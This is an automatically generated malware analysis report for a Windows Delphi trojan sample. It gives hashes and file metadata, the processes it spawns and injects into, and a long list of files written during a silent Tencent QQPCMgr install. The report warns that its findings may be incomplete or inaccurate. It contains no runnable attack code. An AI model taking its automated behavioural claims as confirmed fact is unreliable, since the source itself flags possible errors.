Trojan.Win32.Delphi_9a8e64b26e

by malwarelabrobot on March 26th, 2016 in Malware Descriptions.

Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR, GenericPhysicalDrive0.YR (Lavasoft MAS)
Behaviour: Trojan, VirTool


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 9a8e64b26e0ca1adb9069df4cb6d7c2f
SHA1: df93786c35c01f8b7e86c9ee37f688d6be44f6d7
SHA256: 7b72d98cb161542c5896ac514934c1a97bb0520bd9d6f4080f8a5043653d91a2
SSDeep: 49152:ZFw6x5dqn FhcTLJApI5GYIKf85rm Qj3c:9ZqnshcTLTg2k5rjQjM
Size: 1759088 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 1992-06-20 01:22:17
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

QQPCMgr_Setup.exe:1648
05a00036.exe:304
sc.exe:1804
InstAsm.exe:464
qqpcmgr_v11.4.17339.217_90008_Silence.exe:296
cacls.exe:876

The Trojan injects its code into the following process(es):

%original file name%.exe:1216
QQPCTray.exe:2820

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process QQPCMgr_Setup.exe:1648 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCXPNOTIFY.exe (4078 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_529.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCFixOpHelper.EXE (4520 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAO\BNSConfig.etf (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCSysOptimize.dat (848 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMGameAssistant.dat (720 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_890.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_1026.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TSVulInf.Dat (323 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMSCEntrancePlugin\QMSCEntrancePlugin.dll (4254 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAVEng.dll (5668 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\TestMSVCR_64.exe (16 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMMobileTrayPlugin\QMMobileTrayPlugin.dll (6309 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1082.dat (6 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMFileMonFrc.dat (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\PluginInfo.xml (37 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMArpMgr\libpng.dll (1172 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMSSO\Bin\SSOLUIControl.dll (5788 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\PersonaLib.dat (9 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMCmcTrayPlugin\QMCmcTrayPlugin.dll (4375 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\DownloaderInfo.dat (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\npQMExtensionsIE.dll (1743 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TSSysKitProxy.dll (1144 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TestStubConfig.xml (425 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QQPCLeakScan\QQPCLeakScan.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1102.dat (455 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\SysCleanPage\SysCleanPage.dll (6042 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMSSO\I18N\2052\SSOStringBundle.xml (6 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMSCEntrancePlugin\QMSCEntrancePlugin.tpc (661 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetMon\QMNetMon.rdb (36 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\router_config.xml (55 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\QMSysSlim.png (691 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\TestMSVCR.exe (16 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPConfig.rdb (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\AMD64.Microsoft.VC80.CRT\8.0.50727.4053.cat (7 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCHardware.dll (3349 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMDLP.exe (7600 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCRealTimeSpeedup.exe (6787 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCmgrInstallGuide.rdb (141 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\PluginInstaller.exe (1610 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\qmavtrayplugin\QMShield48.png (890 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetMon\tinyxml.dll (1057 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\AppLaunch.32.prf (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1008.dat (624 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftMgr\UninstallScan.etf (5 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\NetMon.png (424 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMRtpController.dll (2211 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\SysHomePage\SysHomePage.dll (13283 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMWebFWCfg.dat (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_130.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1098.dat (454 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\tpk\1.0.0.1\def\vircmpinfo.def (5 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMMobileSettingCenter\QMMobileSettingCenter.rdb (62 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\TraceClear\TraceClear.rdb (158 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\DlForQd.dll (2559 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMAutoTaskPlugin\QMAutoTaskPlugin.tpc (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\FileSmash\jgIOStub.dll (14 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QuickOpenLogo\QQPCB2AndroidJmp_QO.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\sm04.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_571.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftMgr\ProcessLogDll.dll (1536 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\tpk\1.0.0.1\def\virscr05.def (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMGameAssistantPlugin\QMGameAssistantPlugin.tpc (845 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\RemNPX.exe (1764 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\malware.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TSMalFilter.dat (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetSpeedTest\QMNetSpeedTestDll.dll (685 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMAdFilter.dat (696 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\7z.dll (9608 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\qmrtpplugin\QMRtpPlugin.dll (3780 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMTPKTrayPlugin\QMTpkTrayPlugin.tpc (712 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QQPCWifiSafe\libjpegturbo.dll (1844 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\qqpccommonmgr.dat (536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\Microsoft.VC80.CRT\msvcm80.dll (5237 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCSoftGame.exe (3976 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1401.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_1.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\pic\sCheck_Wireless.png (7 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftMgr\arkGraphic.dll (2436 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMFeedBack.rdb (83 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMLogCtrl\QMLogCtrl.dll (6295 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1085.dat (447 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMSysRepProv.dll (14227 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TpkUpdate.exe (2888 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\QQPCClinic.png (931 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMGuide.dat (704 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\QQPCWifiSafe.png (816 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1412.dat (5 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMFeedBack.exe (2948 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMGCShellExt.dll (4899 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMMalCore.dll (5485 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\pic\Check_Wireless.png (9 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\HW_SPGameScore.dat (925 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\qmrtpplugin\QMRTPTipsConfig.dat (10 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_1286.png (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\QMNetSpeedTest.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\QMGameSpeedup.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\RtpPage\RtpPage.rdb (278 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAOBase.dll (4831 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMUsbGuard.exe (6731 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCVulPage.rdb (1814 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAVDescr.ipt (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMClinicTrayPlugin\QMClinicTrayPlugin.dll (5110 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMHIPSLogPolicy.dll (1782 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\AMD64.Microsoft.VC80.ATL\ATL80.dll (1213 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCFileOpen.exe (5671 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1023.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\SysCleanPage\SysCleanPage.rdb (137 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\HPScanPluginInfo.xml (36 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMAutoTaskPlugin\QMAutoTaskPlugin.rdb (3252 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\AMD64.Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (468 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1091.dat (6 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TavSignExcl.dat (22 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\tpk\1.0.0.1\def\virinfo.def (52 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMUpdate\libpng.dll (1413 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCRealTimeSpeedup.rdb (241 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMSpecTips\QMSpecTips.rdb (83 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\tsvulsha.dat (109 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\DownloaderInfo.dll (7562 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QQPCWifiSafe\arkGraphic.dll (3377 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\Image\point.png (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_352.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\NodisturbOGList.etf (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMGameAssistant\QMLOLAssistant\QMLOLAssistantShell.tpc (959 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAO\JFZRConfig.etf (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\NetRepair.dat (720 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\IEStartPage\IEStartPage.dll (4329 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQRepairEx.exe (147 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_663.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_1909.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\DownloaderMgrUI\DownloaderMgrUI.rdb (3744 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCSoftTrayTips.exe (9887 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMInterface.dll (1208 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\AMD64.Microsoft.VC80.ATL\Microsoft.VC80.ATL.cat (7 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCSoftTrayTips.rdb (1682 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\qmcloudinter\QMHipsProcessDecouple.dat (31 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAVInterface.dll (1912 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftMgr\data\pinyin.lis (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QQPCWifiSafe\QQPCCommonMgr.rdb (15021 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMRecommenderRes.dat (96 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_10484.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_907.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\tpk\AVEngine.ini (31 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCWSCController.exe (1379 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCfix.dll (6903 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\QMAdFilter.png (545 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\tpk\1.0.0.1\tpkproxy.dll (3549 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\tpk\1.0.0.1\tpk.ini (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1227.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMGameSpeedup.rdb (310 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\sysstartupmgrjmp\StartupMgr.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCPatch.dll (4110 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMSCVulPlugin\QMSCVulPlugin.rdb (19 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\adfilterlib\tsadlibexcept.xml (16 bytes)
%Documents and Settings%\All Users\Application Data\Tencent\QQPCMgr\Quarantine_Cache\QMQuarantine.exe (3139 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\SysCleanPage\syscleanpage.tpc (798 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1095.dat (452 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\adfilterlib\tsadlibpower.xml (1526 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMNetworkMgr64.dll (4850 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ProcessManager.dll (2793 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCAVSetting.exe (5669 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_657.png (794 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1409.dat (5 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMTrojanScan\QMTrojanScan.rdb (5036 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1300.dat (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TSWebShieldX64.dat (3669 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_168.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\GFFtsysCustom.dll (1654 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\HPScanPluginMgr.dll (3813 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAO\MonitorConfig.etf (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\AMD64.Microsoft.VC80.CRT\8.0.50727.4053.policy (808 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1029.dat (6 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\SysGarbageJmp.png (515 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMTPKTrayPlugin\QMTpkTrayPlugin.dll (2797 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\CubeConfig.ini (108 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\Tencentdl.exe (10148 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\tpk\1.0.0.1\def\virscr02.def (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMArpMgr\jgImage.dll (1160 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QQPCWifiSafe\tinyxml.dll (1558 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\tpk\1.0.0.1\tpktt.dll (27623 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMTPKTrayPlugin\QMTpkTrayPlugin.rdb (50 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCConfigCatalog.xml (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMLogCtrl\QMLogCtrl.rdb (160 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMUsbGuard.rdb (119 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\SysHomePage\tab_icon_sys_opt_sys_homepage.png (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMSysOptimizeAssist\QMSysOptimizeAssist.dll (5469 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMArpMgr\libexpatw.dll (2500 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\RtpPage\RtpPage.dll (2800 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\SoftUninstall\SoftUninstall.dll (6338 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\Image\xp.png (26 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMSwitchesMgrPlugin\QMSwitchesMgrPlugin.dll (851 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_1629.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_715.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1100.dat (452 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\bugreport.exe (3465 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMTPIEStartPage\QMTPIEStartPage.rdb (100 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftMgr\jgIOStub.dll (14 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1609.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\SysStartupMgrJmp.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMIESafeDll64.dll (3627 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\SysHomePage\GarbageSoftIcon.zip (280 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMBDScanner.dat (29 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\FZLTCXHJW.TTF (9606 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\GameSpeedupAppPlugins\QMHardwareDetectPlugin\QMHardwareDetectPlugin.rdb (123 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMStartupMonitorNotify\QMStartupMonitorNotify.dll (4630 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TSBlueScreenbak.xml (80 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1606.dat (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\FileSmash\libexpatw.dll (995 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\qmrtpplugin\QMRtpPlugin.tpc (684 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\pedc.dat (1615 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\FastUninstScpt.etf (95 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMGameAssistant.exe (2173 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TSSafeEdit.dat (110 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QuickOpenLogo\QMHealthAssist_QO.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_156.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_1302.png (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\FileSmash\libjpegturbo.dll (2271 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMSpecTips\QMSpecTips.dll (3650 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMAutoTaskPlugin\SubPlugins\QMGameAssistantPlugin.dll (2573 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\SysOptLib.dat (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\Image\net_err.jpg (15 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1108.dat (455 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\StartupMgr\StartupMgr.dll (11084 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\FileSmash\arkGraphic.dll (3675 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMNewsTips\QMNewsTips.tpc (727 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\IEStartPage\browserlist.dat (13 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMStartupMonitorNotify\QMStartupMonitorNotify.tpc (905 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTencentNews.rdb (177 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\AppLaunch.48.prf (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\tpk\1.0.0.1\def\virstr00.def (692 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\QQPCClinicSys.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\jgIOStub.dll (14 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\QQPCB1AndroidJmp.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\config\ClinicTrayConfig.xml (77 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMSysRepLibRisk.dat (5 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\QMDnsPlugin.png (409 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\FileSmash\jgImage.dll (884 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMUpdate\jgIOStub.dll (14 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMAssocScanLib.dat (1639 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\qmaplocal.dat (109 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1026.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\pic\TurnOnAdapter.png (17 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMAVProxy.dll (616 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMSCVulPlugin\QMSCVulPlugin.dll (3144 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\pic\Check_Router.png (6 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\NetflowMgr.dll (2002 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAO\DZSConfig.etf (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1200.dat (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQFileFlt.dll (19 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMSSO\I18N\2052\PGFStringBundle.xml (6 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\StartupLoad.dat (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCFileOpen.dat (712 bytes)
